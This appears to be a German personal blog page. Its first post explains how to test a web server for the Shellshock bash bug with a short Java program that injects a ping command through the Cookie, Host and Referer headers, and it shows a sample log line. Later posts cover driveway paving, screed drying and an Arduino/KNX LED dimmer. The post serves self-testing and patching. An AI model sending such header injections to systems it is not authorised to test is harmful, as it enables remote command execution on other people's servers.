Shellshock: Der Test am eigenen System

Seit kurzer Zeit ist eine neue, wirklich schwerwiegende Sicherheitslücke bekannt geworden: Shellshock. Nachzulesen hier:

http://www.heise.de/newsticker/meldung/Bash-Luecke-ShellShock-ist-noch-nicht-ausgestanden-2403607.html

http://www.golem.de/news/bash-luecke-die-hintergruende-zu-shellshock-1409-109463.html

Da immer mehr Eigenheime über Remote-Zugriffe verfügen und diese per HTTP zu erreichen sind, stellt sich unweigerlich die Frage: Ist mein System sicher? Wie teste ich das?

Wer mit Java vertraut ist kann dieses Beispiel hier benutzen (gibt sicher noch andere Wege):

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection; 

public class ShellShockTest {
 
 public static void main(String[] args) throws Exception {
 URL url = new URL("http://<zutestenderserver>");
 URLConnection conn = url.openConnection();
 conn.setRequestProperty("User-Agent", "shellshock-scan (<deinname>)");
 conn.setRequestProperty("banners", "true");
 conn.setRequestProperty("Cookie", "() { :; }; ping -1 3 <serverfürpingfeedback>");
 conn.setRequestProperty("Host", "() { :; }; ping -c 1 <serverfürpingfeedback>");
 conn.setRequestProperty("Referer", "() { :; }; ping -c 1 <serverfürpingfeedback>");
 BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
 String inputLine;
 while ((inputLine = in.readLine()) != null)
   System.out.println(inputLine);
 in.close();
 }
 
}

Ersetze „<zutestenderserver>“ mit dem Namen des Zielsystems.

Damit Du Deinen eigenen Test in den Logfiles identifizieren kannst, ersetze noch „<deinname>“ durch Deinen Namen.

Um zu sehen ob das Zielsystem anfällig ist, wird versucht ein Ping auf ein anderes System auszuführen. Hier solltest du „<serverfürpingfeedback>“ mit einem

  1. im Internet direkt erreichbaren System
  2. für dich einsehbares System

ersetzt werden.

Code übersetzen, ausführen und gleichzeitig die Webserver Accesslog-Datei im Auge behalten, sowie auf dem „<serverfürpingfeedback>“ System ein Netzwerktrace auf ICMP Ebene durchführen (wireshark, tcpdump, …).

Im Webserver-Logile wirst du nun den HTTP Request sehen. Sieht bei mir z.B. so aus:

1.2.3.4 - - [26/Sep/2014:10:20:56 +0200] "GET / HTTP/1.1" 200 467 "() { :; }; ping -c 3 4.3.2.1" "shellshock-scan (huhu)"

1.2.3.4 ist das zu testende System, und 4.3.2.1 ist das System für die Ping-Rückmeldung.

Wenn im Netzwerktrace dann ein ICMP Request von 1.2.3.4 auftaucht, dann ist das System über Apache anfällig. Ist das nicht der Fall, bist du erstmal fein raus.

Debian und Ubuntu nutzen übrigens nicht Bash, sondern Dash per Default. Das macht die Sache „etwas“ sicherer. Aber eben nicht „ganz sicher“.

Nichts desto trotz: Sicherstellen dass alle verfügbaren Updates eingespielt wurden….

Wenn es gut werden soll …

Kurzmitteilung

.. braucht man einen anständigen Rüttler bevor man die Einfahrt pflastert.

Man sollte meinen es ist kein Problem eine Einfahrt in Eigenleistung anständig zu pflastern?! Pustekuchen. Es ist gar nicht so einfach eine Rüttelplatte jenseits von 250kg aufzutreiben. Der örtliche Baustoffhandel vermietet ebenfalls Geräte. Der dort größte Rüttler hat 114kg (oder 140? Weiß nicht mehr genau).
Der Vermieter „Boels“ beim Hornbach in Sinsheim hat auch nur Rüttler bis 140kg. Bei Rent2000 in Rauenberg (das wäre von der Entfernung noch erträglich) hat zwar einen 248kg Rüttler, aber der steht nicht in Rauenberg, sondern in Sandhausen. Das sind allein 40min fahrt, pro Richtung.
Nach einigem hin und her hat mein Haus und Hof-Verleiher in Lobbach doch den 280kg Rüttler schon früher frei. Welch ein Glück…
Heute Abend kann es dann endlich weiter gehen.

 

Aktion: Einfahrt pflastern

Nachdem wir uns nach langem hin und her für einen Pflasterstein entschieden hatten geht es nun wieder mal ans eingemachte:

Vergangenen Mittwoch kam der bestellte Bagger auf der Baustelle an. Geplant war dass mit dem Bagger am Mittwoch die Einfahrt geebnet wird, am Freitag der Split eingebracht wird und am Samstag gleich gepflastert werden kann. Doch wie immer: Es kam anders als geplant.  Weiterlesen

Und schon wieder: Preise vergleichen

Gestern zufällig im IKEA Walldorf gesehen: Ein Schreibtisch der sich elektrisch in der Höhe verstellen lässt.

Stuhlmangelbedingt bin ich heute (freiwillig) eine Weile am Schreibtisch gestanden, statt gesessen. Dabei viel mir wieder der IKEA Schreibtisch ein. Da unsere Firmen-Büromöbel auch von IKEA sind hatte ich das mal schnell gegoogelt. Weiterlesen

Estrich + Sahara = Trocken in 3-4 Wochen; Ein Zwischenstand

Für die Trocknung unseres Estrichs prognostizierte man uns 6-7 Wochen. Gedauert hat es nun keine 4 Wochen.

Das Aufheizprotokoll des Estrichlegers sah folgendes Programm vor:

  • 4 Tage Ruhe nach Einbau (kein Lüften, kein Begehen)
  • 1. Tag heizen: 25°C Vorlauftemperatur
  • 2. Tag heizen: 35°C
  • 3. Tag heizen: 45°C
  • 4. Tag heizen: 55°C
  • 5. Tag: Temperatur halten bis Belegreife erreicht
  • ….
  • n. Tag abkühlen: pro Tag wieder 10°C zurück

Weiterlesen

Das erste Ergebnis der China-Bestellung

Mittlerweile sind nun alle Teile aus China für meinen Selbstbau-Dimmer eingetroffen. Ergänzt habe ich es noch um ein paar Teile von Reichelt.

Bereits nach wenigen Minuten konnte ich mit dem Arduino einen 3m LED Streifen stufenlos dimmen. Super Sache.

https://www.youtube.com/watch?v=F8a99YWbdA4

 

Der MOSFET der die LEDs mit PWM beschaltet lächelt übrigens hinsichtlich der Belastung von fast 24 Watt. Von Abwärme absolut keine Spur. Da ist also noch ordentlich Luft nach oben.

Jetzt dann noch das gleiche mit KNX:

Also den Siemens Busankoppler angezapft, den Code ein bisschen erweitert und schon klappt’s auch über KNX:

https://www.youtube.com/watch?v=ajvleXMCRoI

Ich war nur zu faul das Zimmerlicht an zu schalten. So hat die Kamera versucht die Überbelichtung durch abdunkeln abzufangen. Hat sie auch geschafft, mit dem Ergebnis dass man das Dimmverhalten nicht ganz so toll sieht.

Jetzt heißt es die Software aufbohren und auf 7 statt 1 Kanäle erweitern, sowie die ganzen tollen Features die ich mir von einem Dimmer Wünsche zu implementieren. Zum Bleistift einen Sonnenaufgang/-Untergang-Modus. Könnte hilfreich sein wenn man Nachwuchs hat der im dunkeln nicht einschlafen kann 😉

Wohnraumbeleuchtung mit LED

Nach einer Diskussion im KNX User Forum über die Kosten/Nutzen-Rechnung von LED-Beleuchtung hatte ich mich dort auch zu Wort gemeldet und meine „Low-Cost“ Variante vorgestellt. Darauf hin gab es einige Anfragen wie ich das nun umgesetzt habe. Damit ich das nicht 5x erzählen muss, hier nun ein umfassender Artikel zu diesem Thema.

Weiterlesen